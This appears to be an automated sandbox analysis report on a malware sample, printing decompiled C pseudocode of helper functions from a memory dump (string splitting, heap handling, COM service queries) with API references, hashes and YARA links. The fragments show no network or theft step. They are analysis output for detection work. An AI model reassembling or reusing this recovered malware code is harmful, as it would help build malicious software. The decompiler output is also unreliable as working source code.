0x03c46434

APIs

lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 03C463A1
StrStrA.SHLWAPI(00000000,?), ref: 03C463AE
RtlAllocateHeap.NTDLL(00000000,?), ref: 03C463CD

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: 95d821839651a1168bf5cebdde430e504056af9ad15877b1ea944b5f38b44139
Instruction ID: 66789598a62b8dab5afddd3a869360546137301876bbae003d23c23bb4351765
Opcode Fuzzy Hash: 95d821839651a1168bf5cebdde430e504056af9ad15877b1ea944b5f38b44139
Instruction Fuzzy Hash: 90217139600209AFCF11DF69D984B9EBFB5EF85250F198155EC14DB309C730EA15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C44A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E03C44A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E03C41525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x3c4c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x03c44a2e
0x03c44a3b
0x03c44a3d
0x03c44a3e
0x03c44a46
0x03c44a46
0x03c44a4a
0x00000000
0x00000000
0x03c44a41
0x03c44a42
0x03c44a45
0x03c44a45
0x03c44a52
0x03c44a57
0x03c44a5c
0x03c44a64
0x03c44a6a
0x03c44a6c
0x03c44a6f
0x03c44a73
0x03c44a75
0x03c44a78
0x03c44a78
0x03c44a79
0x03c44a7b
0x03c44a78
0x03c44a85
0x03c44a88
0x03c44a8b
0x03c44a8c
0x03c44a8e
0x03c44a95
0x03c44a95
0x03c44aa1

APIs

StrChrA.SHLWAPI(?,00000020,00000000,048F95AC,03C430F3,?,03C41173,?,048F95AC,?,03C430F3), ref: 03C44A46
StrTrimA.SHLWAPI(?,03C4C284,00000002,?,03C41173,?,048F95AC,?,03C430F3), ref: 03C44A64
StrChrA.SHLWAPI(?,00000020,?,03C41173,?,048F95AC,?,03C430F3), ref: 03C44A6F

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 781b4c2960b137b8315752b123d7b1fe6a09a6e8b25504547dd42eefc5adb0c0
Instruction ID: 96887e8980219b017186d704946a8a5ea216efe395013372d47d1e4793cb1fc2
Opcode Fuzzy Hash: 781b4c2960b137b8315752b123d7b1fe6a09a6e8b25504547dd42eefc5adb0c0
Instruction Fuzzy Hash: 2701DF723003066FE724DE6B8C4AF67BB9DEBC5340F288021B946CF282DA70C9428764

Uniqueness

Uniqueness Score: -1.00%

Function 03C48B7B, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E03C48B7B(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E03C4944A(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x3c4d2a8; // 0xcaa5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x3c4e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x3c4e8ec; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E03C43179();
					_push( &_v64);
					if( *0x3c4d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E03C43179();
				}
				return _t28;
			}

0x03c48b7b
0x03c48b82
0x03c48b8b
0x03c48b90
0x03c48b94
0x03c48b9e
0x03c48ba3
0x03c48ba8
0x03c48bad
0x03c48bb7
0x03c48bc1
0x03c48bc1
0x03c48bb9
0x03c48bb9
0x03c48bb9
0x03c48bb9
0x03c48bc7
0x03c48bcd
0x03c48bce
0x03c48bd1
0x03c48bd4
0x03c48bd7
0x03c48bdf
0x03c48be8
0x03c48bf0
0x03c48bf0
0x03c48bf2
0x03c48bf4
0x03c48bf4
0x03c48bfe

APIs

Part of subcall function 03C4944A: SysAllocString.OLEAUT32(00000000), ref: 03C494A4
Part of subcall function 03C4944A: SysAllocString.OLEAUT32(0070006F), ref: 03C494B8
Part of subcall function 03C4944A: SysAllocString.OLEAUT32(00000000), ref: 03C494CA

memset.NTDLL ref: 03C48B9E
GetLastError.KERNEL32 ref: 03C48BEA

Strings

<, xrefs: 03C48BAD

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <
API String ID: 3736384471-4251816714
Opcode ID: 3931edabc95f42124ac8db8608616961716b51c9f2b520b70afb42d8c55fa526
Instruction ID: f62a74e5241eca77df36edeea9ba15f565202cf8b1a79b4535c4dfdec78b3a58
Opcode Fuzzy Hash: 3931edabc95f42124ac8db8608616961716b51c9f2b520b70afb42d8c55fa526
Instruction Fuzzy Hash: 42012D75D00318AFDB10EFA9DC84EDEBBACAB08750F054166FA04EB251D73199448B91

Uniqueness

Uniqueness Score: -1.00%

Function 03C45008, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C45008(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E03C41525(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x3c4d2d8, 0x90);
					_t27 =  *0x3c4d2dc; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E03C4A50A(0x90, _a4, _a4, _t27, 0);
					}
					if(E03C48B48( &_v36) != 0 && E03C44416(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E03C43301(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						_t20 =  &(_t46[4]); // 0x8b4875c6
						memset(_t55, 0, _v12 - ( *_t20 & 0xf));
						_t57 = _t57 + 0xc;
						E03C48B22(_t55);
					}
					memset(_a4, 0, _t53);
					E03C48B22(_a4);
				}
				return _v16;
			}

0x03c4500e
0x03c45013
0x03c45020
0x03c45023
0x03c45026
0x03c4502b
0x03c45030
0x03c4503e
0x03c45043
0x03c45048
0x03c4504d
0x03c4504f
0x03c45058
0x03c45058
0x03c45067
0x03c4508a
0x03c45090
0x03c45096
0x03c4509e
0x03c450a4
0x03c450a7
0x03c450b4
0x03c450b9
0x03c450bd
0x03c450bd
0x03c450c8
0x03c450d3
0x03c450d3
0x03c450df

APIs

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

memcpy.NTDLL(00000000,00000090,00000002,00000002,03C47D16,00000008,03C47D16,03C47D16,?,03C42CE0,03C47D16), ref: 03C4503E
memset.NTDLL ref: 03C450B4
memset.NTDLL ref: 03C450C8

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 1b2224c29a305f6606f55bcb1c1bf89c24494cbf6d1518f8dfbe679da01f14a9
Instruction ID: 91c24204135b94af112515fad34b187fa41d420f1fa22d8c0d6d6d6e429819ee
Opcode Fuzzy Hash: 1b2224c29a305f6606f55bcb1c1bf89c24494cbf6d1518f8dfbe679da01f14a9
Instruction Fuzzy Hash: 7C21317AA00718ABDB11EF66CC40FEEBBB8EF09640F154015F914EB241EB35DA00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004199BF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

Qa, xrefs: 004199B9

Memory Dump Source

Source File: 00000000.00000002.509696033.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID:
String ID: Qa
API String ID: 0-3901847582
Opcode ID: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction ID: d549b22444e3bbfa7cb210ea9846235e74cf2f4631409ec7e49220ed27a67046
Opcode Fuzzy Hash: 1a5d0e7a21e9ded79f3144e41253d67be37013d1d8d597091abbc164341298d6
Instruction Fuzzy Hash: B4011AB1610149EBDB14CF95C454BEB73A5AF48344F14805AF80987340E73DDE95CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03C4767F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E03C4767F(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E03C4A224(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x3c4d2a8; // 0xcaa5a8
						_t9 = _t17 + 0x3c4ea38; // 0x444f4340
						_t20 = E03C4636D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x3c4d238, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x03c47682
0x03c47688
0x03c476df
0x03c4768e
0x03c47699
0x03c4769e
0x03c476a2
0x03c476af
0x03c476b7
0x03c476c3
0x03c476cb
0x03c476d5
0x03c476d5
0x03c476a2
0x03c476e4

APIs

Part of subcall function 03C4A224: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 03C4A23C

Part of subcall function 03C4636D: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 03C463A1
Part of subcall function 03C4636D: StrStrA.SHLWAPI(00000000,?), ref: 03C463AE
Part of subcall function 03C4636D: RtlAllocateHeap.NTDLL(00000000,?), ref: 03C463CD

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,03C429B3), ref: 03C476D5

Strings

Ut, xrefs: 03C476D5

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID: Ut
API String ID: 2220322926-8415677
Opcode ID: 6cc02da04e6e1b336ff5cf25a4a5c8fa6de009591110e00e1464837f059292c3
Instruction ID: dc000f88d98ad3fa7560e05dbdbb723da8d21920d30d58315b58c6fd6a26f2b6
Opcode Fuzzy Hash: 6cc02da04e6e1b336ff5cf25a4a5c8fa6de009591110e00e1464837f059292c3
Instruction Fuzzy Hash: 4101317A100504FFDB21EF58DC41EDABBAEEB44290F154125FA16CA160E731EE55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03C48B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C48B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x3c4d238, 0, _a4); // executed
				return _t2;
			}

0x03c48b2e
0x03c48b34

APIs

RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Strings

Ut, xrefs: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: f4413c6840f30e464c200a4ca7779d6e29cfefc878f7ea9493b5c953216420b4
Instruction ID: f9484108d066a6ac82dcde79c43b3940ca82a017c4b86f87975160d9fd140260
Opcode Fuzzy Hash: f4413c6840f30e464c200a4ca7779d6e29cfefc878f7ea9493b5c953216420b4
Instruction Fuzzy Hash: C6B01279100100BBCB217F50DE08F05FA21AB50700F008010F3068407887325C20FB15

Uniqueness

Uniqueness Score: -1.00%

Function 03C49595, Relevance: 3.1, APIs: 2, Instructions: 149
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E03C49595(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x3c4d2a8; // 0xcaa5a8
				_t4 = _t49 + 0x3c4e450; // 0x48f89f8
				_t82 = 0;
				_t5 = _t49 + 0x3c4e440; // 0x9ba05972
				_t51 =  *0x3c4d158(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x3c4d2a8; // 0xcaa5a8
						_t30 = _t56 + 0x3c4e430; // 0x48f89d8
						_t31 = _t56 + 0x3c4e460; // 0x4c96be40
						_t58 =  *0x3c4d0f8(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x3c4d2a8; // 0xcaa5a8
											_t23 = _t77 + 0x3c4e430; // 0x48f89d8
											_t24 = _t77 + 0x3c4e460; // 0x4c96be40
											_t106 =  *0x3c4d0f8(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x3c4d2a8; // 0xcaa5a8
													_t67 = _v28;
													_t40 = _t100 + 0x3c4e420; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}

0x03c495a0
0x03c495a7
0x03c495a8
0x03c495a9
0x03c495aa
0x03c495b0
0x03c495b5
0x03c495be
0x03c495c1
0x03c495c8
0x03c495ce
0x03c495d2
0x03c495d8
0x03c495e0
0x03c495e1
0x03c495e6
0x03c495e7
0x03c495e9
0x03c495ec
0x03c495ed
0x03c495ee
0x03c495f4
0x03c4968a
0x03c4968f
0x03c49696
0x03c496a0
0x03c496a6
0x03c496a8
0x03c496ae
0x00000000
0x03c495fa
0x03c495fa
0x03c49601
0x03c4960a
0x03c4960e
0x03c49614
0x03c49617
0x03c4967f
0x00000000
0x03c49619
0x03c49619
0x03c496b1
0x03c496b3
0x00000000
0x00000000
0x03c4961f
0x03c4961f
0x03c49621
0x03c49626
0x03c4962a
0x03c4962d
0x03c49632
0x03c4963a
0x03c4963b
0x03c4963c
0x03c4963e
0x03c49642
0x03c49646
0x00000000
0x03c49648
0x03c4964c
0x03c49651
0x03c49658
0x03c49668
0x03c4966a
0x03c49670
0x03c49675
0x03c496b5
0x03c496b5
0x03c496c2
0x03c496c6
0x03c496cb
0x03c496d1
0x03c496d6
0x03c496e0
0x03c496e2
0x03c496e8
0x03c496e8
0x03c496eb
0x03c496f1
0x00000000
0x00000000
0x00000000
0x03c49675
0x00000000
0x03c49677
0x03c49677
0x03c49678
0x00000000
0x03c4967d
0x03c49619
0x03c49617
0x03c4960e
0x03c496f4
0x03c496f4
0x03c496fa
0x03c496fa
0x03c49703

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,048F89D8,03C49478,?,?,?,?,?,?,?,?,?,?,?,03C49478), ref: 03C49662
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,048F89D8,03C49478,?,?,?,?,?,?,?,03C49478,00000000,00000000,00000000,006D0063), ref: 03C496A0

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 0b036c3106c1a65b3cfef7db346c27407b71b25a4dae1ad368931e8bd54a59c3
Instruction ID: 7b8c694df58ba08752f72602b0303b0a4c74fe67f2a0cb74cfc495935224ff6a
Opcode Fuzzy Hash: 0b036c3106c1a65b3cfef7db346c27407b71b25a4dae1ad368931e8bd54a59c3
Instruction Fuzzy Hash: 885130B5900219AFCB40DFE8C888DEEB7B9FF48314B054999E906EB215D731AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C476E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03C476E7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E03C48A19(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x3c4d2a8; // 0xcaa5a8
						_t20 = _t68 + 0x3c4e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E03C4A6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x03c476ed
0x03c476f0
0x03c47700
0x03c47709
0x03c4770d
0x03c477db
0x03c477e1
0x03c477e1
0x03c47727
0x03c4772c
0x03c47730
0x03c47736
0x03c4773b
0x03c47742
0x03c47751
0x03c47751
0x03c47755
0x03c47757
0x03c47763
0x03c4776e
0x03c47779
0x03c4777d
0x03c47787
0x03c4778b
0x03c4778d
0x03c47792
0x03c47799
0x03c477a9
0x03c477a9
0x03c47792
0x03c4778b
0x03c477ab
0x03c477b0
0x03c477b5
0x03c477b5
0x03c477b8
0x03c477c1
0x03c477c6
0x03c477c6
0x03c477cb
0x03c477d0
0x03c477d0
0x03c477cb
0x03c47755
0x03c477d2
0x03c477d8
0x00000000

APIs

Part of subcall function 03C48A19: SysAllocString.OLEAUT32(80000002), ref: 03C48A76
Part of subcall function 03C48A19: SysFreeString.OLEAUT32(00000000), ref: 03C48ADC

SysFreeString.OLEAUT32(?), ref: 03C477C6
SysFreeString.OLEAUT32(03C44BD8), ref: 03C477D0

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5d2c5451594d88f3930dea39d183d05fb90f77232c994031563534deb2499936
Instruction ID: 53b0c98668d6abd2d09aae30f5e0203bd9e7cd20a0de28bd0c5366f9dbec02e9
Opcode Fuzzy Hash: 5d2c5451594d88f3930dea39d183d05fb90f77232c994031563534deb2499936
Instruction Fuzzy Hash: AB314A7A500118AFCB12DF54C988C9BBBB9FFC97407554658F915DB220E331DD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C44580, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E03C44580(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x3c4d2a8; // 0xcaa5a8
				_t2 = _t42 + 0x3c4e470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x3c4d2a8; // 0xcaa5a8
					_t6 = _t45 + 0x3c4e490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x3c4d2a8; // 0xcaa5a8
							_t30 = _v8;
							_t12 = _t48 + 0x3c4e480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x03c4458c
0x03c4458d
0x03c44593
0x03c4459a
0x03c4459c
0x03c445a0
0x03c445a4
0x03c445a6
0x03c445af
0x03c445b5
0x03c445bd
0x03c445bf
0x03c445c3
0x03c445c5
0x03c445d2
0x03c445d6
0x03c445db
0x03c445e1
0x03c445e6
0x03c445ee
0x03c445f0
0x03c445f2
0x03c445f8
0x03c445f8
0x03c445fb
0x03c44601
0x03c44601
0x03c44604
0x03c4460a
0x03c4460a
0x03c44611

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03C445BD
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 03C445EE

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 05021f6984b935d436ff17b469e41b079bce60d9d3e2b6ad822a5a96b5159043
Instruction ID: ab33e8251c35b9b59b840c491163bfb0aa0da1a7bce73c8ed71780bc233bc1d1
Opcode Fuzzy Hash: 05021f6984b935d436ff17b469e41b079bce60d9d3e2b6ad822a5a96b5159043
Instruction Fuzzy Hash: A12112B9900619EFCB10DBA4C448D5AF779FF88714B158688ED05DB315D731ED41CB90

Uniqueness

